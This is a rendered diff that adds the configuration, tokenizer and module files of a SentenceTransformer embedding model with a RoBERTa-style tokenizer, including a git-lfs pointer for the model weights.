"position_embedding_type": "absolute",
|
22 |
+
"torch_dtype": "float32",
|
23 |
+
"transformers_version": "4.52.4",
|
24 |
+
"type_vocab_size": 1,
|
25 |
+
"use_cache": true,
|
26 |
+
"vocab_size": 50265
|
27 |
+
}
|
config_sentence_transformers.json
ADDED
@@ -0,0 +1,14 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"model_type": "SentenceTransformer",
|
3 |
+
"__version__": {
|
4 |
+
"sentence_transformers": "5.0.0",
|
5 |
+
"transformers": "4.52.4",
|
6 |
+
"pytorch": "2.6.0+cu124"
|
7 |
+
},
|
8 |
+
"prompts": {
|
9 |
+
"query": "",
|
10 |
+
"document": ""
|
11 |
+
},
|
12 |
+
"default_prompt_name": null,
|
13 |
+
"similarity_fn_name": "cosine"
|
14 |
+
}
|
merges.txt
ADDED
The diff for this file is too large to render.
See raw diff
|
|
model.safetensors
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:25916e4dd9e51f4101337629a68e231c207326859f0dcdaa5c2ac7ba18841969
|
3 |
+
size 498604904
|
modules.json
ADDED
@@ -0,0 +1,14 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
[
|
2 |
+
{
|
3 |
+
"idx": 0,
|
4 |
+
"name": "0",
|
5 |
+
"path": "",
|
6 |
+
"type": "sentence_transformers.models.Transformer"
|
7 |
+
},
|
8 |
+
{
|
9 |
+
"idx": 1,
|
10 |
+
"name": "1",
|
11 |
+
"path": "1_Pooling",
|
12 |
+
"type": "sentence_transformers.models.Pooling"
|
13 |
+
}
|
14 |
+
]
|
sentence_bert_config.json
ADDED
@@ -0,0 +1,4 @@
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"max_seq_length": 512,
|
3 |
+
"do_lower_case": false
|
4 |
+
}
|
special_tokens_map.json
ADDED
@@ -0,0 +1,51 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"bos_token": {
|
3 |
+
"content": "<s>",
|
4 |
+
"lstrip": false,
|
5 |
+
"normalized": true,
|
6 |
+
"rstrip": false,
|
7 |
+
"single_word": false
|
8 |
+
},
|
9 |
+
"cls_token": {
|
10 |
+
"content": "<s>",
|
11 |
+
"lstrip": false,
|
12 |
+
"normalized": true,
|
13 |
+
"rstrip": false,
|
14 |
+
"single_word": false
|
15 |
+
},
|
16 |
+
"eos_token": {
|
17 |
+
"content": "</s>",
|
18 |
+
"lstrip": false,
|
19 |
+
"normalized": true,
|
20 |
+
"rstrip": false,
|
21 |
+
"single_word": false
|
22 |
+
},
|
23 |
+
"mask_token": {
|
24 |
+
"content": "<mask>",
|
25 |
+
"lstrip": true,
|
26 |
+
"normalized": false,
|
27 |
+
"rstrip": false,
|
28 |
+
"single_word": false
|
29 |
+
},
|
30 |
+
"pad_token": {
|
31 |
+
"content": "<pad>",
|
32 |
+
"lstrip": false,
|
33 |
+
"normalized": true,
|
34 |
+
"rstrip": false,
|
35 |
+
"single_word": false
|
36 |
+
},
|
37 |
+
"sep_token": {
|
38 |
+
"content": "</s>",
|
39 |
+
"lstrip": false,
|
40 |
+
"normalized": true,
|
41 |
+
"rstrip": false,
|
42 |
+
"single_word": false
|
43 |
+
},
|
44 |
+
"unk_token": {
|
45 |
+
"content": "<unk>",
|
46 |
+
"lstrip": false,
|
47 |
+
"normalized": true,
|
48 |
+
"rstrip": false,
|
49 |
+
"single_word": false
|
50 |
+
}
|
51 |
+
}
|
tokenizer.json
ADDED
The diff for this file is too large to render.
See raw diff
|
|
tokenizer_config.json
ADDED
@@ -0,0 +1,58 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"add_prefix_space": false,
|
3 |
+
"added_tokens_decoder": {
|
4 |
+
"0": {
|
5 |
+
"content": "<s>",
|
6 |
+
"lstrip": false,
|
7 |
+
"normalized": true,
|
8 |
+
"rstrip": false,
|
9 |
+
"single_word": false,
|
10 |
+
"special": true
|
11 |
+
},
|
12 |
+
"1": {
|
13 |
+
"content": "<pad>",
|
14 |
+
"lstrip": false,
|
15 |
+
"normalized": true,
|
16 |
+
"rstrip": false,
|
17 |
+
"single_word": false,
|
18 |
+
"special": true
|
19 |
+
},
|
20 |
+
"2": {
|
21 |
+
"content": "</s>",
|
22 |
+
"lstrip": false,
|
23 |
+
"normalized": true,
|
24 |
+
"rstrip": false,
|
25 |
+
"single_word": false,
|
26 |
+
"special": true
|
27 |
+
},
|
28 |
+
"3": {
|
29 |
+
"content": "<unk>",
|
30 |
+
"lstrip": false,
|
31 |
+
"normalized": true,
|
32 |
+
"rstrip": false,
|
33 |
+
"single_word": false,
|
34 |
+
"special": true
|
35 |
+
},
|
36 |
+
"50264": {
|
37 |
+
"content": "<mask>",
|
38 |
+
"lstrip": true,
|
39 |
+
"normalized": false,
|
40 |
+
"rstrip": false,
|
41 |
+
"single_word": false,
|
42 |
+
"special": true
|
43 |
+
}
|
44 |
+
},
|
45 |
+
"bos_token": "<s>",
|
46 |
+
"clean_up_tokenization_spaces": false,
|
47 |
+
"cls_token": "<s>",
|
48 |
+
"eos_token": "</s>",
|
49 |
+
"errors": "replace",
|
50 |
+
"extra_special_tokens": {},
|
51 |
+
"mask_token": "<mask>",
|
52 |
+
"model_max_length": 512,
|
53 |
+
"pad_token": "<pad>",
|
54 |
+
"sep_token": "</s>",
|
55 |
+
"tokenizer_class": "RobertaTokenizer",
|
56 |
+
"trim_offsets": true,
|
57 |
+
"unk_token": "<unk>"
|
58 |
+
}
|
vocab.json
ADDED
The diff for this file is too large to render.
See raw diff
|
|